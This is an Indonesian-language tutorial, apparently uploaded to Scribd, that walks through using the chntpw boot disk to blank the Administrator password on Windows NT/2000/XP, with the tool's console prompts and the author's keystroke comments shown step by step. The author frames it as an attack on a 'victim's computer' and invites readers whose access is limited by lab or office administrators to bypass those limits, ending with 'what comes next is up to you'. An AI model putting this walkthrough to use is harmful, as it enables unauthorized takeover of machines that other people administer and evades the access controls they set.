Scribd
Upload
12 views

passwordXP

Uploaded by

Memy Lewe
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOC, PDF, TXT or read online on Scribd
12 views

passwordXP

Uploaded by

Memy Lewe
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOC, PDF, TXT or read online on Scribd
You are on page 1/ 7

Arti dari akses fisik disini adalah bila anda memiliki ijin untuk dapat memakai komputer

tersebut dan terutama anda dapat memasukkan disket ke dalam komputer korban.

Mungkin anda termasuk orang yang terlampau dibatasi pemakaian komputernya oleh
admin di lab/kantor anda, sekaranglah saatnya anda malampaui batas anda ;) Pada artikel
ini anda akan belajar bagaimana menghapus password Administrator dan kemudian bisa
menggantinya sesuai dengan keinginan anda.

Baiklah kita mulai saja, tapi sebelumnya saya mau pesan bahwa artikel ini saya tulis
untuk pengetahuan semata !! Bila terjadi hal yang tidak diinginkan, itu di luar tanggung
jawab saya. Hal ini perlu saya sampaikan agar jangan ada yang menuntut saya karena
satu dan lain hal.

Yang kita butuhkan adalah sebuah Bootdisk image yang dapat didownload di
http://home.eunet.no/~pnordahl/ntpasswd/bd040116.zip. Setelah didownload segera
ekstrak dan jalankan file install.bat, tapi sebelumnya masukkan sebuah disket kosong ke
dalam floppy disk drive anda. Ketika file install.bat dijalankan, maka sebuah floppy disk
yang bootable akan dibuat. Nah, disket inilah yang akan kita gunakan untuk melakukan
hack.

Setelah bootdisk selesai dibuat, restart komputer anda dengan membiarkan disket tadi
tetap di floppy disk drive. Mungkin anda perlu mengatur boot sequence agar ketika
booting yang pertama kali diboot adalah floppy disk drive.
Bila disket anda berhasil diboot, maka tinggal ikuti petunjuk saja. Berikut adalah
cuplikan dari program tersebut : ( komentar saya akan diawali dengan tanda '-->')

--> tampilan yang muncul pertama kali


****************************************************************
* This utility will enable you to change the password of almost
* any user (incl. administrator) on an Windows NT/2k/XP installation
* WITHOUT knowing the old password.
* The program is now able to actually parse/follow the internal
* registry structure completely.
* There is now support for adding and deleting keys and values.
* Tested on: NT3.51 & NT4: Workstation, Server, PDC.
* Win2k Prof & Server to SP3. Cannot change AD.
* XP Home & Prof: up to SP1
* Now also works with syskey, read warnings if applicable.
* You may either let the scripts try to figure out your configuration,
* or you may do it manually from the shell prompts.
* Good luck!

Press return/enter to continue


--> tekan enter
* In /etc/main.rc....
Calling scsi.rc to probe for SCSI controllers
Mounting floppy to fetch drivers from /scsi on it
SCSI-drivers found on floppy:
BusLogic.o.gz aic7xxx.o.gz
Do you have your NT disks on a SCSI controller?
y - this will autoprobe for the driver
n - no, skip SCSI, I have IDE drives
or give the scsi-driver modules name (without the .o or .gz)
+ optional parameters to go directly for a known driver

Probe for SCSI-drivers: [n]


--> tekan enter
Calling part.rc to select partition
Partitions found on the disk(s):
Device Boot Start End Blocks Id System
/dev/hda1 * 1 1859 14932386 7 HPFS/NTFS

Probable NT partitions:
/dev/hda1 * 1 1859 14932386 7 HPFS/NTFS
Wnat partition contains your NT installation?
[/dev/hda1] : Enter
FAT: Did not find valid FSINFO signature.
Found signature1 0x66024a1e signature2 0xc88b6602 sector=4.
VFS: Can't find a valid FAT filesystem on dev 03:01.
mount: wrong fs type, bad option, bad superblock on /deb/hda1,
or too many mounted fil systems
/dev/hda1 is NTFS.
Trying to mount as readwrite on /mnt
NTFS volume version 3.0.
Success. Mounted NTFS /deb/hda1 on /mnt
Calling path.rc. to select path
What is the full path to the registry directory?
[winnt/system32/config] :

--> tekan enter


-rw------- 1 0 0 65536 Jan 15 09:00 AppEvent.Evt
-rw------- 1 0 0 65536 Jan 15 09:00 default
-rw------- 1 0 0 65536 Jan 15 09:00 default.LOG
-rw------- 1 0 0 65536 Jan 15 09:00 default.sav
-rw------- 1 0 0 65536 Jan 15 09:00 netlogon.ftl
-rw------- 1 0 0 65536 Jan 15 09:00 SAM
-rw------- 1 0 0 65536 Jan 15 09:00 SAM.LOG
-rw------- 1 0 0 65536 Jan 15 09:00 SecEvent.Evt
-rw------- 1 0 0 65536 Jan 15 09:00 SECURITY
-rw------- 1 0 0 65536 Jan 15 09:00 SECURITY.LOG
-rw------- 1 0 0 65536 Jan 15 09:00 software
-rw------- 1 0 0 65536 Jan 15 09:00 software.LOG
-rw------- 1 0 0 65536 Jan 15 09:00 software.sav
-rw------- 1 0 0 65536 Jan 15 09:00 SysEvent.Evt
-rw------- 1 0 0 65536 Jan 15 09:00 system.sav
-rw------- 1 0 0 65536 Jan 15 09:00 TempLey.LOG
-rw------- 1 0 0 65536 Jan 15 09:00 userdiff
-rw------- 1 0 0 65536 Jan 15 09:00 userdiff.LOG

Which hives (files) do you want to edit (leave default for


password setting, separate multiple names with spaces)

[sam system security] :


--> tekan enter
Copying sam system security to /tmp
Now running chntpw
chntpw version 0.99.0 030112, (c) Petter N Hagen
Hive's name (from header) (\SystemRoot\System32\Config\Sam)
ROOT KEY at offset: 0x001020
File size 32768 [8000] bytes, containing 7 pages (+ 1 headerpage)
Used, for data: 319/26472 blocks/bytes, unused: 6/1976 blocks/bytes.
Hive's name (from header): (SYSTEM)
ROOT KEY at offset: 0x001020

File size 2555904 [270000] bytes, containing 584 pages (+ 1 headerpage)


Used, for data: 44209/2524072 blocks/bytes, unused: 19/9048 blocks/bytes.
Hive's name (from header): (SYSTEM)
ROOT KEY at offset: 0x001020

File size 49152 [c000] bytes, containing 11 pages (+ 1 headerpage)


Used, for data: 859/42568 blocks/bytes, unused: 5/2136 blocks/bytes.
Hello, this is SAM!
Failed logins before lockout is : 0
Minimum password length :0
Password history count :0
()========() chntpw Main Interactive Menu ()========()
Loaded hives: (sam) (system) (security)
1 - Edit user data and passwords
2 - Syskey status & change
---
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] ->

--> Nah, karena kita akan mengganti password Administrator maka tekan saja enter
==== chntpw Edit User Info & Passwords ====
RID: 03f2, Username: (Administrator)
RID: 03f2, Username: (gandhi)
RID: 03f2, Username: (Guest), disabled or locked*

Select: ! - quit, . - list users, 0x(RID) - User with RID (hex)


or simple enter the username to change: [Administrator]

--> tekan enter (user Administrator yang akan direset)


RID : 032f
Username: Administrator
fullname:
comment :
homedir :

Account bits: 0x0215 =


[ ] Disabled | [ ] Homedir req. | [ ] passwd not req. |
[ ] Temp. duplicate | [X] Normail account | [ ] NMS account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act |
[X] Pwd don't expir | [ ] Auto lockout | [ ] (unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) |

Failed login count: 0, while max tries is : 0


Total login.count :7
Account is disabled
Crypted NT pw : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Crypted LM pw : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
MD4 hash : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
LANMAN hash : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

* = blank the password (EXPERIMENTAL! but may fix problems)


Enter nothing to leave it unchanged
Please enter new password: *

-> Anda akan diminta untuk memasukkan password untuk menggantikan password
Administrator, lebih baik anda langsung enter saja, yang berarti passwordnya
ditinggalkan kosong.

Blanking password. This may actually fix things if previous password-preset


did not work. Or it may even make things worse. Happy joy!

Do you really wish to change it? (y/n) [n]

--> ketik y
Select: ! - quit, . - list users, 0x(RID) - User with RID (hex)
or simple enter the username to change: [Administrator]
--> ketik !
()========() chntpw Main Interactive Menu ()========()
Loaded hives: (sam) (system) (security)
1 - Edit user data and passwords
2 - Syskey status & change
---
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] ->


--> ketik q
Hives that have changed:
# Name
0 (sam)
Write hive files? (y/n) [n] :
--> ketik y
Calling write.rc to select write back sam file
About to write file(s) back! Do it? [n]
--> ketik y
Writing sam
* end of scripts.. returning to the shell..
* Press CTRL-ALT-DELL to reboot now (remove floppy first)
* or do whatever you want from the shell..
* However, if you mount something, remember to umount before reboot
* You may also restart the script procedure with 'sh /scripts/main.rc'
#

Nah, selamat ! Sekarang restart komputer anda dan anda dapat login dengan username
Adminisrtator dengan mengosongkan password. Selanjutnya ? terserah anda ;)
pesan untuk lmt at far ui '02 :
10*(2*x^2+y^2+z^2-1)^3 - x^2*z^3 - 10*y^2*z^3 = 0

You might also like